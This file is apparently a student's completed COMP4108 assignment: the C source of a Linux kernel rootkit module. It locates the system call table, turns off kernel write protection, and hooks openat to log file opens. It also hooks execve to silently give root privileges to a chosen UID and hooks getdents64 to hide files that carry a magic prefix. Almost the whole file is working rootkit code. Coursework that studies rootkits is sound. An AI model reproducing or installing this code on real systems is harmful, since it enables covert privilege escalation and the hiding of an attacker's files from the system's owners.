/*
 * COMP4108 Rootkit Framework
*/

#include <linux/sched.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/dirent.h>
#include <linux/slab.h>
#include <linux/version.h>
#include <linux/proc_ns.h>
#include <linux/fdtable.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>

#ifndef __NR_getdents
#define __NR_getdents 141
#endif
#define MODULE_NAME "rootkit"

// The linux dirent structure for Part C
struct linux_dirent {
        unsigned long   d_ino;
        unsigned long   d_off;
        unsigned short  d_reclen;
        char            d_name[1];
        char            pad;
        char            d_type;
};

unsigned long cr0;
static unsigned long *__sys_call_table;

typedef asmlinkage long (*t_syscall)(const struct pt_regs *);

static t_syscall original_openat; // create a variable to store the original openat function
static t_syscall original_execve; // create a variable to store the original execve function
static t_syscall original_getdents; // create a varable to store the original getdents function

/*
 * TODO: NEEDED FOR PART B AND C
 *  create a variable as above to store the original execve and getdents functions
*/


/*
 * The suffix to use for the openat hook code. This is the file extension
 * we will be detecting. See insert.sh for how this is passed to the rootkit.
*/
static char* suffix;
module_param(suffix, charp, 0);
MODULE_PARM_DESC(suffix, "Received suffix parameter");


//******
//TODO: NEEDED FOR PART B
//	Accept root_uid as a kernel module parameter 
//	(see module_parm() example above)
//******
/*
 * When a user with an effective UID = root_uid runs a command via execve()
 * we make our hook grant them root priv. root_uid's value is provided as a
 * kernel module argument.
 */
static int root_uid;
module_param(root_uid, int, 0);



//******
//TODO: NEEDED FOR PART C
//	Accept magic_prefix as a kernel module parameter
//	(see module_parm() example above)
//******
/*
 * Files that start with a prefix matching magic_prefix are removed from the
 * linux_dirent64* buffer that is returned to the caller of getdents()
 */
static char* magic_prefix = NULL;
module_param(magic_prefix, charp, 0);

/* 
 * TODOne: NEEDED FOR PART A
 *  Update the string provided to the kallsyms_lookup_name function
 * 
 * Locates the address of the system call table using kallsyms_lookup_name
 * and returns it as an unsigned long *
*/
unsigned long * get_syscall_table_bf(void){
  unsigned long *syscall_table;
  syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
  return syscall_table;
}


/*
 * Our version of the syscall is defined here. We want to match the return type
 * and argument signature of the original syscall.
 * 
 * This is an example of how to hook openat(). Our version will print to the
 * kernel which file the function was called for.
*/
asmlinkage int new_openat(const struct pt_regs* regs){
  // Declare our return value and a variable to store the filename
  long ret;
  char *filename;
  size_t filename_len;
  size_t suffix_len;

  // Get the filename the syscall was called for
  filename = kmalloc(4096, GFP_KERNEL); // alocate kernel memory

  // copy the filename into the kernel variable
  if (strncpy_from_user(filename, (void*) regs->si, 4096) < 0){
    kfree(filename);
    return 0;
  }

  // Check if the file is a .txt (has the .txt extension)
  filename_len = strlen(filename);
  suffix_len = strlen(suffix);
  if (filename_len >= suffix_len){
    if (strncmp(filename + (filename_len - suffix_len), suffix, suffix_len) == 0){
      printk(KERN_INFO "openat() called for %s\n", filename);
    }
  }

  kfree(filename);

  // Invoke the original openat syscall
  ret = original_openat(regs);

  return ret;
}


/*
 *New execve defined here 
 *
*/ 
asmlinkage int new_execve(const struct pt_regs* regs){
  char *filepath;
  int euid;
  //For question 2. 
  struct cred *new_cred;

  filepath = kmalloc(4096, GFP_KERNEL); // alocate kernel memory for filepath
//for exec the pathname is the first argument which coresponds to rdi
  if (strncpy_from_user(filepath, (void*) regs->di, 4096) < 0){
    kfree(filepath);
    return 0;
  }
  //getting effective kuid from current then converting from a kuid to a uid_t that can be read as an int
  euid = __kuid_val(current_euid());
  printk(KERN_INFO "Executing %s\n", filepath);
  printk(KERN_INFO "Effective UID %d\n", euid);

  kfree(filepath);

  if(euid == root_uid){
    new_cred = prepare_kernel_cred(current); //create a new cred that's a copy of the current one
    new_cred->euid = KUIDT_INIT(0); //set the new cred's effective UID to root
    commit_creds(new_cred); //set the new cred as the real one 
  }
  
  return original_execve(regs); //run execve 
}

/*
Checks if str has the prefix defined by suffix
*/
bool check_prefix(char* str){
  bool has_prefix = false;
  int i;
  if(magic_prefix == NULL){ return false;}
  has_prefix = false;
    for(i = 0; ;){
        
        if(magic_prefix[i] == '\0'){
          has_prefix = true;
          break;
        }
        if(str[i] == '\0'){ break;}
        if(str[i] != magic_prefix[i]){ break; }
        i++;
    }
    return has_prefix;
}

/*
New getdents defined here
*/
asmlinkage int new_getdents(const struct pt_regs* regs){
  unsigned int buff_size;
  struct linux_dirent64 *d;
  int bpos, copy_bpos;
  char *buf, *copy_buf;
  char *entry;
  int nread, new_ret;
  short val;
  
  printk(KERN_INFO "getdents64() hook invoked. \n");

  entry = kmalloc(4096, GFP_KERNEL); // alocate kernel memory for the entry names
  buf = (void*) regs->si; //copy the buffer from regs, casting it to a void pointer
  buff_size = regs->dx; //copy the buffer size from regs, it's the 3rd argument to getdents64(fd, *dirp, count)  

  nread = original_getdents(regs); //populate the buffer and store the size in nread
  copy_buf = kmalloc(buff_size, GFP_KERNEL); //alocate a buffer the same size as the original
  new_ret = 0;//the length of the copy buffer
  copy_bpos = 0;

  d = (struct linux_dirent64 *) (buf);

  //iterate through the whole original buffer
  for(bpos = 0; bpos < nread;){
    d = (struct linux_dirent64 *)(buf + bpos); //grab the next dirent64, pointed to by the bpos cursor 
    strncpy_from_user(entry, (void*) d->d_name, 4096); //copy the name to kernel memory, not checking return since this was populated by getdents not by user input
    copy_from_user(&val, &(d->d_reclen), sizeof(short)); //copy the short to kernel memory 
    printk(KERN_INFO "entry:   %s\n", entry); //print the name to kern info for part 1

    //if the file has the prefix then don't add it to the copy buffer and don't increase the size of the return
    if(!check_prefix(entry)){
      copy_from_user(copy_buf + copy_bpos, d, val); //copy this part of the buffer from the userspace original buffer to the kernelspace copy buffer
      copy_bpos += val; //move the cursor over for the copy buffer
      new_ret += val; //increase the reported size of the copy buffer for the return
    }

    bpos += val; //move the cursor over by the size of the entry
  }


  copy_to_user(buf, copy_buf, buff_size); //move the copy buffer to where the old buffer points
  kfree(entry);
  kfree(copy_buf);
  return new_ret; //returns the size of the copy buffer
}
/*
 * Used to let us modify memory regions and syscalls
*/
static inline void write_cr0_forced(unsigned long val){
  unsigned long __force_order;
  asm volatile(
    "mov %0, %%cr0"
    : "+r"(val), "+m"(__force_order));
}

/*
 * Protect memory (so it can't be modified)
*/
static inline void protect_memory(void){
  write_cr0_forced(cr0);
}

/*
 * Unprotect memory (so we can modify it)
*/
static inline void unprotect_memory(void)
{
  write_cr0_forced(cr0 & ~0x00010000);
}

/*
 * Module initalization
*/
static int __init init_rootkit(void)
{
  printk(KERN_INFO "Rootkit module initializing.\n");

  __sys_call_table = get_syscall_table_bf(); // Get the sys_call_table information

  if (!__sys_call_table)
    return -1;

  cr0 = read_cr0();

  /*
   * TODO: NEEDED FOR PART A, B, AND C
   *  Uncomment the following lines as needed to store the original functions
   *  before they are hooked. You will need to add lines for the execve and
   *  getdents functions.
  */

  // Let's store the original functions so they can be restored later

  original_openat = (t_syscall)__sys_call_table[__NR_openat];
  original_execve = (t_syscall)__sys_call_table[__NR_execve];
  original_getdents = (t_syscall)__sys_call_table[__NR_getdents64];

  /*
   * TODOne: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory(); 
  /*
   * TODOne: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */

  // Let's hook openat() for an example of how to use the framework
  __sys_call_table[__NR_openat] = (unsigned long) new_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Hook your new execve and getdents functions after writing them
  */

  // Let's hook execve() for privilege excalation
  __sys_call_table[__NR_execve] = (unsigned long) new_execve;
  // Let's hook getdents() to hide our files
  __sys_call_table[__NR_getdents64] = (unsigned long) new_getdents;

  /*
   * TODOne: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module is loaded!\n");
  return 0; // For successful load
}

static void __exit cleanup_rootkit(void){
  printk(KERN_INFO "Rootkit module is unloaded!\n");

  /*
   * TODOne: NEEDED FOR PART A
   *  Unprotect the memory by calling the appropriate function
  */
  unprotect_memory();
  /*
   * TODOne: NEEDED FOR PART A
   *  Uncomment after completing the unprotect and protect TODO's
  */
  // Let's unhook and restore the original openat() function
  __sys_call_table[__NR_openat] = (unsigned long)original_openat;

  /*
   * TODO: NEEDED FOR PARTS B AND C
   *  Unhook and restore the execve and getdents functions
  */

  // Let's unhook and restore the original execve() function
  __sys_call_table[__NR_execve] = (unsigned long) original_execve;
  // Let's unhook and restore the original getdents() function
  __sys_call_table[__NR_getdents64] = (unsigned long) original_getdents;

  /*
   * TODOne: NEEDED FOR PART A
   *  Protect the memory by calling the appropriate function
  */
  protect_memory();

  printk(KERN_INFO "Rootkit module cleanup copmlete.\n");
}

module_init(init_rootkit);
module_exit(cleanup_rootkit);

MODULE_AUTHOR("Your Friendly Neighbourhood Hacker");
MODULE_LICENSE("GPL");
